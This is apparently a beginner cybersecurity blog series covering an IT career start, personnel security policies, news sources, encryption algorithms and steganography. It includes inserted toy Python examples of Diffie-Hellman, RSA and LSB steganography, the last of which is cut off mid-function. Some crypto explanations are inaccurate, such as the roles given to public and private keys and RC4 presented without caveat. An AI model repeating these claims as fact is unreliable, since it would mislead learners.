BLOG BY EULA
Cybersecurity Central is excited to share Blog by CC.
Bookmark this page and check back to learn what Eula Chua is discovering in her #infosec journey.
#cybersecuritycentral #diversityofthought #blogbycc
AUG 7, 2023
Easing In
by Eula Chua
August 7, 2023
I never thought 2023 would be such a fast and busy year for me. It has officially been 6 months since I entered the field of Information Technology! It has been such an endless learning experience on the job, and it makes me excited for what’s next.
Because it’s been such a huge change in routine for me, my mind was craving more professional development, but it was difficult to find time with how demanding personal and work responsibilities can be. That said, I was glad to have booked off one of the weekends in May to learn some Microsoft Azure Fundamentals, which is something I would love to share more about in a future post!
But for this week, I’m choosing to ease myself in and absorb everything I’ve learned in the past 6 months. I do apologize that I have been quite MIA for the past few weeks. Not only am I easing into a fairly new career path, I’ve also been planning and preparing for a new chapter in life that I may or may not share in another future post, we shall see!
Life has its ways of surprising you. And when it does, you take what you get and mold it into something beautiful. I’ll see you at the next post and hope to share more about what I’ve been learning (tech and non-tech related).
Let’s stay connected on socials: https://www.LinkedIn.com/in/eulac-lipro
MAY 10, 2023
Security at Work
by Eula Chua
May 10, 2023
Working in IT has been great these past few months. Every day, I get to learn different parts of the operation. From doing onboarding/offboarding tasks such as setting up laptops and managing mobile devices to diving deep into the administration side of IT, I’m fortunate to be exposed to all kinds of different issues that allow me to exercise my problem-solving skills. As I continue to ease into the environment and define my role, I also think about the improvements that we can implement in our environment.
You might not realize this: every day you are practicing cybersecurity. It is not confined to one role. Whether you’re working in the cybersecurity sector or just starting out your IT career, everyone has a part in keeping their environment secured – leading by example, using a password manager, creating complex passwords, keeping a clean desk space, running Windows updates consistently, the list goes on. Most issues we encounter can be prevented through user education. Get your users on board with best security practices. Keep them informed on rising trends. Take every opportunity to implement security at your workplace, because the worst thing that can happen is a business being shut down by a single click that could have been prevented. A great place to start talking about security at work is through security awareness training.
Check out these resources to learn more about security awareness:
Infosec: Security Awareness -- Definition, History, and Types | Infosec Resources https://resources.infosecinstitute.com/topic/security-awareness-definition-history-types/
Amazon Security Awareness Training: https://learnsecurity.amazon.com/en/index.html
Mimecast: What is Security Awareness Training & Why is it Important?
CybSafe: 7 reasons why security awareness training is important in 2023
Microsoft: Cybersecurity Awareness – Microsoft Security
Let’s stay connected on socials: https://www.LinkedIn.com/in/eulac-lipro
APR 26, 2023
Types of Personnel Policies to Mitigate Risks: Part III of III
by Eula Chua
April 26, 2023
As we reach the last stretch of how to mitigate security risks through the implementation of personnel policies, it’s important to note that not all risks come from the network; they arise offline as well. Otherwise, these policies wouldn’t exist. This week, we’re looking deeper into the remaining four policies, which are Non-Disclosure Agreement (NDA), Third-Party Risk Management, Terms of Agreement, and Measurement Systems Analysis.
1. Non-Disclosure Agreement - This policy is implemented between two parties so that data shared between them is not disclosed to unauthorized parties. It is also used in companies to prohibit employees from disclosing data that is strictly meant to be kept within the organization. This includes not sharing with unauthorized entities while employed or after leaving the company. This category includes social media analysis, which is used to verify whether an employee is compliant with the policies in place.
2. Third-Party Risk Management - This can be overlooked, especially when trust is involved. Many do not realize that being connected to other entities outside of the company can pose a risk. This is where having security policies can help with mitigating these risks. Third-Party Agreements include:
a. Memorandum of Understanding (MOU)/Memorandum of Agreement (MOA), where two or more entities come to an understanding in terms of working towards a mutual goal
b. Business Partners Agreement (BPA), where a written agreement is established between business partners to indicate their responsibilities and obligations while working together
c. Service Level Agreement (SLA), where expectations are laid out between an entity and a vendor to ensure standards are met
3. Terms of Agreement - This is usually added as a clause in a legal document, indicating when an agreement comes into effect.
4. Measurement Systems Analysis (MSA) - This determines the accuracy of data collected by evaluating the tools and processes used to measure. An example of this would be measuring data based on the type of equipment being used and how it is being used.
What policies do you notice that are heavily implemented in your current organization? Do you feel that it’s working to mitigate risk or create restrictions on the processes done at your organization?
References:
Gibson, D. (2020). CompTIA Security+ : Get Certified Get Ahead SY0-601 Study Guide. Ycda, Llc.
APR 12, 2023
Types of Personnel Policies to Mitigate Risks: Part II of III
by Eula Chua
April 12, 2023
Continuing the topic of security policies, here are the next 4 personnel policies that will help mitigate risks and data theft within an organization. Taking these preventative measures will also help the organization build reliability and trust with external parties and internal employees.
Job Rotations - This policy can be temporary or permanent. Not only does this concept require employees to switch between different job roles for exposure and learning opportunities, but it also prevents or exposes fraudulent activity. This is similar to the separation of duties concept, which prevents giving full control to an individual.
Clean Desk Space - As self-explanatory as it can be, having a clean desk space ensures that an area is kept organized and reduces the chance of leaving any sensitive information out in the open. Keeping a desk space free of paper prevents possible data theft or potential leaks of confidential information.
Background Check - Usually performed during the onboarding process, a background check helps build trust and identifies any part of the employee’s history that may pose a risk to the company. Background checks vary within each organization, depending on what type of roles and responsibilities an employee will be performing. Background checks may include criminal record checks, financial credit checks, and social media/online activities.
Onboarding & Offboarding - Onboarding is the start of the hiring process, where an employee is given the IT equipment needed to perform their job and access to the appropriate resources within the organization using a work account. Offboarding is the process done when an employee is exiting the company. In these situations, everything that was issued to the employee at the start is collected. This process includes disabling all related work accounts and collecting IT equipment, keys/key card access, laptops, phones, and other devices.
Take a moment to observe your current employer. Are some of these personnel policies mentioned being practiced within your workplace or are they non-existent? What can you do to improve information security within your workplace? What is something you can start doing today?
For more information regarding personnel policies, check out the reference below. This serves as a great study resource for the CompTIA Security+ and I highly recommend it.
References:
Gibson, D. (2020). CompTIA Security+ : Get Certified Get Ahead SY0-601 Study Guide. Ycda, Llc.
MAR 29, 2023
Types of Personnel Policies to Mitigate Risks: Part I of III
by Eula Chua
March 29, 2023
I’m beginning to witness how the material I studied during my CompTIA Security+ exam preparation is being implemented in a corporate environment. As part of the administrative control category, maintaining personnel policies can help reduce and manage risk by preventing data theft and loss, as well as incidents, when followed by employees. Although the policies pertain to personnel behaviour and expectations, they help keep security top of mind. There are 12 categories under personnel policies. In each blog, we’ll go through 4 of them:
Acceptable Use Policy - This policy mainly introduces computer systems and networks but also describes the responsibilities of users when accessing the systems and how they can be accessed. Organizations may include AUPs in their contracts upon hiring. Users are informed that they can be monitored based on their web and email activity. The purpose of this is to help prevent users from accessing data from external sources that may potentially introduce a breach into the network of the organization.
Mandatory Vacations - This policy requires employees to take time off from work. By doing so, this can help detect any malicious activities occurring that may involve employees. This also helps to deter fraud, but not necessarily prevent it.
Separation of Duties - This principle prevents fraud, errors, and theft by dividing tasks between multiple employees. Delegating different tasks to other employees prevents a single employee or entity from completing an entire process on their own or having full control of a process that may be deemed sensitive, lessening the chances of committing fraud.
Least Privilege - This policy grants an individual only the specific rights and permissions they need, and nothing more. In order to reduce risk and potential losses, a user is given access to a limited amount of data, enough to perform their assigned tasks without overly restricting them.
For more information regarding personnel policies, check out the reference below. This serves as a great study resource for the CompTIA Security+ and I highly recommend it.
References:
Gibson, D. (2020). CompTIA Security+ : Get Certified Get Ahead SY0-601 Study Guide. Ycda, Llc.
Let’s stay connected: https://www.LinkedIn.com/in/eulac-lipro
MAR 15, 2023
Cybersecurity on YouTube
by Eula Chua
March 15, 2023
Everyone has their own way of absorbing and learning new information. Today’s technology has enabled us to learn via different avenues—through books, articles, podcasts, and videos.
Having a 9-5 schedule can be difficult, especially when you’re using a lot of brain power at work. Making time for learning and development after work is a commitment and sometimes it’s just not doable for everyone. If you’re in this position, don’t worry. You are not alone.
A few weeks ago, I recommended a few resources for keeping up with the latest IT/cybersecurity news via articles.
If you are currently following us on LinkedIn, you’ll notice that every Monday, we post about what’s happening #ThisWeekInCybersecurity where we share shows, segments, and learning opportunities from Cybersecurity industry experts.
Some are long-form, others short. If you’re on the road or commuting to work, YouTube is a great platform to stay up-to-date. Though cybersecurity communities are ever present on LinkedIn, here are some channel recommendations on YouTube where you can also engage and be a part of the community. From giving guidance on how to grow a career in cybersecurity to sharing what it’s like to work in the industry, these are some of the experts I have been following and learning from:
Most of these are located on Cybersecurity Central's Resources by CC page. Check it out, then let us know if you have a channel to recommend. If so, send us a message on LinkedIn!
Let’s stay connected: https://www.LinkedIn.com/in/eulac-lipro
MAR 8, 2023
My (almost) 3 Month Journey in a Gist
by Eula Chua
March 8, 2023
It was once a thought, let alone a dream, to be able to work in IT. I’m almost three months in and I cannot emphasise enough how rewarding it is to be in this field. I love that I get to assist users with simple or complex issues and resolve them together.
At my workplace, every day is different. There are days where I would be working on the ticket queues, supporting users within the office, online, on construction sites, or past the border with all kinds of issues — printers, networks, hardware, e-mail, software, and more. There are days where I would be setting up new IT equipment for onboarding employees and days where I would be moving an entire department onto a new floor. As someone who usually performs well with routine, I did not expect to enjoy a schedule with so much flexibility.
I found that being in IT is not just about fixing things. A big part of being in IT is building relationships, especially if you’re working in an internal IT team for a company. Not only am I learning and building my technical and communication skills, I am also building resilience and growing in humility. “You don’t know what you don’t know.” When it comes to encountering a problem you’ve never dealt with before, it’s important to be honest with yourself and with the user. If you’re not sure how to solve something, communicate the truth with them but most importantly, reassure them that you will find a way to get the issue solved. Most of the time, the user will understand depending on the level of issue that you are dealing with. I found that putting myself in the other person’s shoes is what helps me understand what the user might be going through and how I can better assist them.
Overall, my experience in IT and in my new workplace has been amazing so far. There’s definitely a lot of learning, growth, and opportunity in the position that I am in. Although I have been having trouble balancing my time between work, leisure (and LinkedIn), I hope that in the next couple of months I’ll be able to find time to further my studies, build up my skills within IT and cybersecurity, and continue sharing my journey with you.
Let’s stay connected: https://www.LinkedIn.com/in/eulac-lipro
FEB 22, 2023
Keeping Up-to-Date With Cybersecurity News
by Eula Chua
February 22, 2023
With all the personal responsibilities, professional development, and other daily tasks we have on our plates, it can be hard to find time to keep up with what’s new within the IT/cybersecurity industry.
New technologies and trends continue to advance rapidly. It’s essential to stay up-to-date to ensure we don’t miss out on what could help or break our systems, let alone our overall workflows.
Whether you have time during a workout or listen/read during a commute, here are some of the top news resources you should check out:
Simply Cyber’s Daily Cyber Threat Brief: Gerald Auger, PhD - Simply Cyber
CISO Series’s Cyber Security Series: Home - CISO Series
Bleeping Computer’s latest articles: BleepingComputer
IT World Canada’s Cybersecurity Today: Technology News for IT Professionals in Canada | IT World Canada
The CyberWire’s CyberWire Daily: CyberWire Daily
The Hacker News: The Hacker News | #1 Trusted Cybersecurity News Site
Security Week: Security Week Home
Dark Reading: Dark Reading | Security | Protect The Business
Sophos’ Naked Security: Naked Security
Take a look at our tab above for more resources recommended by Cybersecurity Central and follow us on our Cybersecurity Central LinkedIn page for new updates every week!
Follow Eula on LinkedIn at: https://www.linkedin.com/in/eulac-lipro
FEB 8, 2023
Asymmetric Key Encryption Algorithms
by Eula Chua
February 8, 2023
Hope you had time to reflect as we began the month of February. If you haven’t yet, check out my previous blog post, “Time for Reflection”.
Two weeks ago, we looked into what a symmetric key encryption algorithm is and the key differences between the algorithms that fall under that category. This week, we’re going back to our regular programming on encryption algorithms and diving deeper into asymmetric key encryption.
In asymmetric encryption, 2 different keys are used: a public key for encrypting and a private key for decrypting. A common use for this type of encryption is when messages are sent over the network, allowing secure communication between 2 parties. In this case, the public key enables others to view and access what is being sent, while the private key only allows authenticated users to access what is sent to them. Both keys are needed to be able to decode a message. Although the encryption process is slow, this type is used to transfer small amounts of data. This makes asymmetric encryption more secure than symmetric encryption, and it provides confidentiality, authenticity, and non-repudiation. A few examples are: Diffie-Hellman, ElGamal, ECC (Elliptic-Curve Cryptography), RSA (Rivest Shamir Adleman), and DSS (Digital Signature Standard). Let’s look at the key points of each one.
Diffie-Hellman:
- Developed in the 1970s by Dr. Whitfield Diffie and Dr. Martin Hellman
- Key exchange technique used within insecure networks
- Enables 2 users to exchange public and private keys securely
- Used in applications where a new key pair is generated per new session
- Includes a password-authenticated key agreement
- Best used to counter man-in-the-middle/on-path attacks
ElGamal:
- Founded by Taher Elgamal in the 1980s
- Based on the Diffie-Hellman exchange
- The goal is to make it difficult to calculate the encryption approach even if the attacker knows certain information
ECC (Elliptic Curve Cryptography):
- Creates smaller and efficient cryptography keys
- Faster and lightweight
- More secure as it is able to generate more robust mathematical keys
- Can be used in combination with other encryption methods for increased security and performance using fewer keys
RSA (Rivest Shamir Adleman):
- Founded by Ron Rivest, Adi Shamir, and Leonard Adleman in the 1970s
- Most widely used to asymmetrically encrypt data that is sent over insecure networks
- Provides data integrity, confidentiality, and authenticity of transmitted data
- Can have key lengths of 1024 or 2048 bits
DSS (Digital Signature Standard):
- Uses digital signatures to authenticate encrypted data, files, and software
- Can detect signs of attempted tampering or modification of data while in transit
- US federal government agencies use DSS to generate and validate digital signatures
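To make the Diffie-Hellman points above concrete, here is an added example (not from the original post) that walks both sides through a key exchange in a constructed toy group (p=23, g=5) so the numbers can be checked by hand. Real deployments use 2048-bit or larger groups or elliptic curves; with p=23 the private exponents can be recovered by trial, which the last function shows, so the group is illustrative only.

```python
"""Ephemeral Diffie-Hellman in a toy group: only the public values cross the wire."""
import hashlib
import secrets

P_MOD = 23   # constructed toy prime modulus (insecure, for illustration only)
G = 5        # a generator of the multiplicative group mod 23


class Party:
    """One endpoint. A fresh private exponent is drawn per session (new key pair per session)."""

    def __init__(self, name):
        self.name = name
        self.private = secrets.randbelow(P_MOD - 2) + 1   # 1 .. p-2, never leaves this object
        self.public = pow(G, self.private, P_MOD)          # g^x mod p, the only value sent

    def shared_secret(self, peer_public):
        """(g^y)^x mod p, which equals (g^x)^y mod p on the other side."""
        return pow(peer_public, self.private, P_MOD)

    def session_key(self, peer_public):
        """Hash the shared secret so the session key has a uniform 256-bit shape."""
        s = self.shared_secret(peer_public)
        return hashlib.sha256(s.to_bytes(2, "big")).digest()


def exchange(alice, bob):
    """Simulate the two messages; return each side's derived key and what an
    observer on the wire can see (only the two public values)."""
    wire = {"Alice->Bob": alice.public, "Bob->Alice": bob.public}
    k_alice = alice.session_key(wire["Bob->Alice"])
    k_bob = bob.session_key(wire["Alice->Bob"])
    return k_alice, k_bob, wire


def keys_agree(alice, bob):
    k_a, k_b, _ = exchange(alice, bob)
    return k_a == k_b


def brute_force_private(public):
    """Why the toy group is insecure: recover x from g^x mod p by trying every exponent."""
    for x in range(1, P_MOD - 1):
        if pow(G, x, P_MOD) == public:
            return x
    return None


def fixed_example():
    """Hand-checkable run: a=6 gives A=5^6 mod 23=8, b=15 gives B=5^15 mod 23=19,
    and both sides compute the shared secret 2."""
    a, b = 6, 15
    A, B = pow(G, a, P_MOD), pow(G, b, P_MOD)
    return A, B, pow(B, a, P_MOD), pow(A, b, P_MOD)


if __name__ == "__main__":
    alice, bob = Party("Alice"), Party("Bob")
    print("keys agree:", keys_agree(alice, bob))
    print("fixed example (A, B, secret at Alice, secret at Bob):", fixed_example())
```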
References:
Types of Encryption [Explanations, Examples, Purposes]. (2022, June 2). Review42.com.
https://review42.com/resources/types-of-encryption/
Asymmetric Encryption: Definition, Architecture, Usage | Okta. (n.d.). Www.okta.com. Asymmetric Encryption: Definition, Architecture, Usage | Okta
Asymmetric Encryption Algorithms, Diffie-Hellman, RSA, ECC, ElGamal, DSA. (n.d.). www.omnisecu.com. https://www.omnisecu.com/security/public-key-infrastructure/asymmetric-encryption-algorithms.php
ElGamal Encryption | Simple Steps How EIGamal Encryption Happens. (2019, December 12). EDUCBA.com https://www.educba.com/elgamal-encryption/
5 Super Asymmetric Encryption Example Use Cases - CyberExperts.com. (2021, November 7). Cyberexperts.com. https://cyberexperts.com/asymmetric-encryption-example/
FEB 1, 2023
Time for Reflection
by Eula Chua
February 1, 2023
Hello February!
Originally I planned to continue on the topic of encryption algorithms, but today’s #BlogByCC happened to fall perfectly on a new start to the month, and to do things differently, I want to take this opportunity to encourage and promote more self-reflection. I noticed that over the years I would go months just zooming through life and end up feeling a little bit lost in between. Just as with studying, if you don’t go back to review what you learned, you’ll end up forgetting it. Similarly with life, if you don’t take the time to reflect on how things are going, how would you know the direction you’re heading is the one you want to be going?
First of all, happy 1st of February! I can’t believe January flew by just like that. I remember starting off the month feeling a mixture of excitement and nervousness. I started my new IT career at a new workplace, which has been amazing so far and exceeds my expectations. There are moments where I felt a little bit of impostor syndrome, but that gets trumped when I realize that I’m in a positive environment surrounded by people who genuinely care for your well-being, growth, and development. I get to say that I am a part of a growing and collaborative team that teaches and supports users on how to effectively use technology to help streamline their workflow. You know you’re making it when work doesn’t feel like work and every day is an opportunity to learn new things.
Enough about me and more about you! As we start a new month, new goals, and new aspirations, take a break to sit down and look back on how your January went. Here are some questions that may help you reflect on the past and upcoming month:
What are you grateful for?
Who are you thankful for?
What are some of the exciting/memorable moments that happened?
What are some challenging moments you encountered and how did you grow from that experience?
What was one thing you learned last month that you will continue to implement?
What is one thing you’ve decided to leave behind?
What adjustments do you need to make that will help you reach your goals?
How did I feel this month and how do I want to feel for next month?
What can you do better?
On behalf of Cybersecurity Central, we hope you have a wonderful month of February! Let us know how we can support you in your personal development and career growth in the IT/Cybersecurity sector by connecting with us through the Cybersecurity Central LinkedIn Page: https://www.linkedin.com/company/cybersecuritycentralorg
JAN 25, 2023
Symmetric Key Encryption Algorithm
by Eula Chua
January 25, 2023
Last week, we looked into the key differences between symmetric and asymmetric key encryption algorithms. The differences lie in the speed at which they process and secure data, the level of security they provide, the number of keys used to encrypt and decrypt, the relative sizes of the cipher text and plain text, and what they are used for.
This week, we’ll dive deeper into symmetric key encryption and its different types. Symmetric encryption keeps communicated data secure so that only authorized users can access it. This type of encryption uses the same key to encrypt and decrypt information. Although this keeps things cost-effective and easy to use, it is less secure. It is best used for handling and transferring large amounts of data. There are several types of symmetric key encryption, which are 3DES, DES, AES, RC4, Twofish, and Blowfish. Let’s look at the key points of each one.
3DES (Triple Data Encryption Standard):
Encrypts data three times, compared to once with DES
Has a fixed-length of 192 bits, using three segments of 64-bit keys
Is a block cipher
Uses a private key
DES (Data Encryption Standard):
Created by an IBM team in the early 1970s
Encrypts using a 56-bit sized key
Block cipher
Considered no longer safe to use
AES (Advanced Encryption Standard):
Created to replace the DES
Block cipher
Originally named Rijndael
Uses three different key lengths to encrypt/decrypt 128-bit blocks: AES-128 (10 rounds), AES-192 (12 rounds), AES-256 (14 rounds)
Method used to protect government and sensitive information
Available for free for public or private use
RC4 (Rivest Cipher 4):
Created by Ron Rivest in 1987
A variable-key-size stream cipher
Uses 64- or 128-bit key sizes
Simple and fast to use
Mainly used in protocols like SSL (Secure Sockets Layer) and TLS (Transport Layer Security)
Twofish:
Successor of Blowfish
Block cipher
A 128-bit block cipher with a variable key length of up to 256 bits
Considered highly secure
Blowfish:
Designed by Bruce Schneier in 1993 as an alternative to DES
Considered a 64-bit block cipher
Uses a variable-length key, from 32 to 448 bits
Uses 16 rounds to encrypt information
Since it’s not patented, this method is available and free to the public
References:
What Is Encryption? Explanation and Types. (n.d.). Cisco. What Is Encryption? Explanation and Types
Geeksforgeeks. (2020, January 29). Difference Between Symmetric and Asymmetric Key Encryption. GeeksforGeeks. Difference Between Symmetric and Asymmetric Key Encryption - GeeksforGeeks
What is RC4 Encryption? (2020, July 14). GeeksforGeeks. What is RC4 Encryption? - GeeksforGeeks
Indeed. (n.d.). Types of Encryption. Indeed. Types of Encryption: 5 Common Encryption Algorithms
Simplilearn. (2020, June 17). What is DES? The Data Encryption Standard Explained. Simplilearn. What Is DES (Data Encryption Standard)? DES Algorithm and Operation [Updated]
JAN 18, 2023
Symmetric vs. Asymmetric Encryption: Key Differences
by Eula Chua
January 18, 2023
I remember studying for the CompTIA Security+ certification a couple of months ago, and the topic I had trouble grasping was the difference between symmetric and asymmetric encryption.
First, let’s look at encryption. Encryption is the process of scrambling readable text (plaintext) into a code (ciphertext) to prevent unauthorized parties from accessing it. The only way it can be converted back to plaintext is if the authorized party possesses the decryption key. This is a method of securing sensitive information that gets passed online.
The two main types of encryption are symmetric and asymmetric. The main difference lies in how keys are used to decrypt/unscramble the secret code.
Symmetric key encryption uses one key to encrypt and decrypt a message or data. Although having one key is convenient and makes the encryption process fast, it is less secure. It requires the receiving party to share the same key as the sender, which puts data being sent over the network at risk of being uncovered.
Asymmetric key encryption requires two keys, a public key and a private key to encrypt and decrypt a message or data. Compared to symmetric key encryption, it is considered much more secure but a much slower process. The downside to this is that if the private key gets lost, there’s no other way to decrypt the data. Geeks for Geeks created a table of comparison that best describes the differences between the two:
Symmetric Key Encryption
It only requires a single key for both encryption and decryption.
The size of the cipher text is the same or smaller than the original plain text.
The encryption process is very fast.
It is used when a large amount of data is required to transfer.
It only provides confidentiality.
The length of the key used is 128 or 256 bits
In symmetric key encryption, resource utilization is low compared to asymmetric key encryption.
It is efficient as it is used for handling large amounts of data.
Security is less as only one key is used for encryption and decryption.
Examples: 3DES, AES, DES and RC4
The mathematical representation is as follows:
P = D(K, E(P))
where K -> encryption and decryption key
P -> plain text
D -> decryption
E(P) -> encryption of plain text
Asymmetric Key Encryption
It requires two keys, a public key and a private key, one to encrypt and the other one to decrypt.
The size of cipher text is the same or larger than the original plain text.
The encryption process is slow.
It is used to transfer small amounts of data.
It provides confidentiality, authenticity, and non-repudiation.
The length of the key used is 2048 or higher.
In asymmetric key encryption, resource utilization is high.
It is comparatively less efficient as it can handle a small amount of data.
It is more secure as two keys are used here- one for encryption and the other for decryption.
Examples: Diffie-Hellman, ECC, El Gamal, DSA and RSA
The mathematical representation is as follows:
P = D(Kd, E(Ke, P))
where Ke -> encryption key
Kd -> decryption key
D -> decryption
E(Ke, P) -> encryption of plain text using encryption key Ke
P -> plain text
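The two relations in the table, P = D(K, E(P)) and P = D(Kd, E(Ke, P)), worked through in code as an added example (not from the original post or from Geeks for Geeks). Both ciphers are teaching toys chosen so the key roles are visible: XOR with a hash-derived keystream for the symmetric case, and textbook RSA with the classic small primes p=61, q=53 for the asymmetric case; neither is safe for real data.

```python
"""Symmetric vs. asymmetric key roles, using the table's own symbols K, Ke, Kd, E, D, P."""
import hashlib


# ---- Symmetric: one key K serves both E and D ---------------------------------
def keystream(K: bytes, n: int) -> bytes:
    """Derive n bytes of keystream from K with SHA-256 in counter mode (toy construction)."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(K + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def E_sym(K: bytes, P: bytes) -> bytes:
    """E(K, P): XOR the plaintext with the keystream derived from K."""
    return bytes(p ^ k for p, k in zip(P, keystream(K, len(P))))


def D_sym(K: bytes, C: bytes) -> bytes:
    """D(K, C): XOR is its own inverse, so decryption reuses the same key K."""
    return E_sym(K, C)


# ---- Asymmetric: Ke (public) encrypts, only Kd (private) decrypts -------------
def rsa_toy_keypair():
    """Textbook RSA with constructed tiny primes; a real key uses 2048-bit or larger moduli."""
    p, q = 61, 53
    n = p * q                  # 3233, the modulus shared by both keys
    phi = (p - 1) * (q - 1)    # 3120
    e = 17                     # public exponent, coprime with phi
    d = pow(e, -1, phi)        # private exponent: e*d = 1 (mod phi), here 2753
    return (e, n), (d, n)      # Ke, Kd


def E_asym(Ke, P: bytes) -> list:
    """E(Ke, P): each byte (< n) is raised to the public exponent mod n.
    Ciphertext is a list of integers up to 12 bits each, so it is larger than P."""
    e, n = Ke
    return [pow(b, e, n) for b in P]


def D_asym(Kd, C: list):
    """D(Kd, C): only the holder of the private exponent inverts the operation.
    A wrong key yields arbitrary residues mod n rather than the original bytes."""
    d, n = Kd
    blocks = [pow(c, d, n) for c in C]
    return bytes(blocks) if all(b < 256 for b in blocks) else None


def demo():
    P = b"Security+ 2023"
    # Symmetric round trip: P = D(K, E(P)) with the same K on both sides.
    K = hashlib.sha256(b"constructed shared secret").digest()
    sym_ok = D_sym(K, E_sym(K, P)) == P
    # Asymmetric round trip: P = D(Kd, E(Ke, P)).
    Ke, Kd = rsa_toy_keypair()
    C = E_asym(Ke, P)
    asym_ok = D_asym(Kd, C) == P
    # Decrypting with the public key does NOT recover P: this is why losing Kd
    # means the data cannot be decrypted, as the post notes.
    wrong_key_fails = D_asym(Ke, C) != P
    return sym_ok, asym_ok, wrong_key_fails, len(C)


if __name__ == "__main__":
    print(demo())
```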
References:
Geeksforgeeks. (2020, January 29). Difference Between Symmetric and Asymmetric Key Encryption. GeeksforGeeks. Difference Between Symmetric and Asymmetric Key Encryption - GeeksforGeeks
Okeke, F. (2022, August 9). Asymmetric vs symmetric encryption: What’s the difference? TechRepublic. Asymmetric vs symmetric encryption: What’s the difference?
JAN 4, 2023
Happy New Year from Team CC!
by Eula Chua
January 4, 2023
We hope that you have an amazing start to the year. Last year was a year full of discoveries and learning. I took some time to evaluate where I was in my current state and where I wanted to be in my career. There were moments that felt painfully slow, in terms of my personal progress, and moments where I felt like things were moving rapidly. There were moments I took risks, and there were others where I wished I had taken the leap of faith. Nevertheless, I’m grateful to be where I am at this moment and for how much I have grown since the start of 2022. Most of my goals came to fruition because of self-reflection. Writing things down and keeping reminders on my calendar kept me away from distractions as much as possible.
This year, I have taken my reflection up a notch, and although this is not related to cybersecurity, I wanted to share this resource with everyone because it’s free! This is not a sponsored post, although I vouch for it, as many of the journal prompts it includes can otherwise only be found in physical journals and planners (which can be costly), or you would have to search for questions on Google or formulate your own.
Year Compass provides you with all the questions that can help you reflect on your past year and re-evaluate what things and habits you need to keep or leave in the past. It also includes writing prompts to help you plan out your 2023 and make it a memorable one. They give you the option of printing a physical copy or downloading a digital copy that you can upload to your digital notes app. Check out the Year Compass here: https://yearcompass.com
What are your goals for the year of 2023? What certifications are you aiming to achieve? What courses will you be taking? What online communities will you be participating in?
Let’s keep one another accountable! Follow Cybersecurity Central on socials below to stay up-to-date with all the livestream events, online courses, and conferences happening every week!
DEC 28, 2022
Steganography
by Eula Chua
December 28, 2022
Upon using TryHackMe as a learning platform, I remember learning about steganography in one of the lessons I started with, and I have not forgotten about it since. So what is steganography?
According to the Merriam-Webster dictionary, steganography is the “art or practice of concealing a message, image, or file within another message, image or file” that is not so secret. The Greek word “steganos” or “stegos” means “covered”, while the word “graph” means “to write.” This could look like a secret message or plain text embedded in a picture. The point of hiding a sensitive message within a seemingly “ordinary” file is to avoid detection or suspicion. To elaborate, let’s look at the 5 different types of steganography.
Text Steganography
This method encodes secret information within a text document. Techniques include line-shift coding, word-shift coding, feature coding, and the syntactic method, which hide bits in small variations of line spacing, word spacing, character shapes, or punctuation. Check out Tutorials Point to learn more about these techniques: What are the Techniques of Text Steganography in Information Security?
Audio Steganography
This method conceals messages within audio clips, either to hide data or to watermark the audio and protect it from unauthorized reproduction.
Image Steganography
This method embeds data within an image, most commonly by making tiny changes to pixel intensity values, for example replacing the least significant bit of each pixel with one bit of the message. The standard terms are:
Cover-image: the ordinary image used to hide the data
Message: the actual data being hidden, which can be text, a file, or another image
Stego-key: an optional key that controls where or how the message is embedded, so that only someone holding the key can extract it
Stego-image: the image obtained after embedding, which carries the hidden data
Video Steganography
This method conceals data within a video file, which acts as the "carrier". Because a video is a sequence of images, image techniques can be applied frame by frame. A common approach embeds the data in the Discrete Cosine Transform (DCT) coefficients that compressed video formats use, rather than in raw pixel values, so that the hidden data survives compression.
Network/Protocol Steganography
This method hides data inside network protocols such as TCP, UDP, and ICMP, typically through covert channels. A covert channel carries information in a place the protocol never intended for it, such as unused or rarely inspected header fields (the IP identification field, TCP initial sequence numbers), padding bytes, or the timing between packets.
The main purpose of steganography is hidden communication between parties who know how to uncover it. It can be used legitimately, for example to watermark media or to move sensitive data past observers who would flag obviously encrypted traffic. With the constant development of technology, steganography is also used to deliver attacks: malware has hidden payloads and command-and-control instructions inside images that a small PowerShell or Bash loader downloads and extracts, and a loader like that can in turn be delivered by a macro in a Word or Excel file that runs as soon as the document is opened. It all depends on the motive.
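Here is an added example, not from the original post or from the resources it cites, of the image technique described above: least-significant-bit (LSB) embedding in Python. It treats the cover-image as a plain buffer of 8-bit grayscale pixel values (a constructed gradient here, so no image library or file is needed) and implements the embed and extract operations with a 32-bit length header and the sanity checks a careless extractor would skip. The payload layout and the helper names are this example's own choices, not a standard.

```python
# Added example (not from the original post): least-significant-bit (LSB)
# image steganography on a raw buffer of 8-bit grayscale pixel values.
# Assumptions: the cover is a bytes object of pixel intensities, the kind an
# image library returns for a lossless format; the "image" below is a
# constructed gradient so the example runs without any image files.

HEADER_BITS = 32  # a 32-bit big-endian length prefix precedes the message


def _to_bits(data: bytes):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover: bytes, message: bytes) -> bytes:
    """Return a stego-image: the cover with message bits written into pixel LSBs.

    Each pixel changes by at most 1 in intensity. Because one pixel carries
    one bit, capacity is len(cover) // 8 bytes minus the 4-byte length header.
    """
    payload = len(message).to_bytes(4, "big") + message
    if len(payload) * 8 > len(cover):
        capacity = max(0, len(cover) // 8 - 4)
        raise ValueError(f"cover holds at most {capacity} message bytes, got {len(message)}")
    stego = bytearray(cover)
    for index, bit in enumerate(_to_bits(payload)):
        stego[index] = (stego[index] & 0xFE) | bit  # clear the LSB, then set it
    return bytes(stego)


def _read_bytes(stego: bytes, bit_offset: int, count: int) -> bytes:
    """Reassemble count bytes from the pixel LSBs starting at bit_offset."""
    out = bytearray()
    for b in range(count):
        value = 0
        for i in range(8):
            value = (value << 1) | (stego[bit_offset + b * 8 + i] & 1)
        out.append(value)
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Recover the message, refusing buffers whose length header is impossible."""
    if len(stego) < HEADER_BITS:
        raise ValueError("buffer too small to hold a length header")
    length = int.from_bytes(_read_bytes(stego, 0, 4), "big")
    if HEADER_BITS + length * 8 > len(stego):
        # An unmodified cover usually fails here: its LSBs are effectively
        # noise, so the decoded "length" points past the end of the buffer.
        raise ValueError("length header exceeds buffer; not a stego-image made by embed()")
    return _read_bytes(stego, HEADER_BITS, length)


def max_pixel_change(cover: bytes, stego: bytes) -> int:
    """Largest per-pixel intensity difference between cover and stego-image."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def make_cover(width: int = 64, height: int = 64) -> bytes:
    """Constructed 8-bit gradient standing in for a real grayscale image."""
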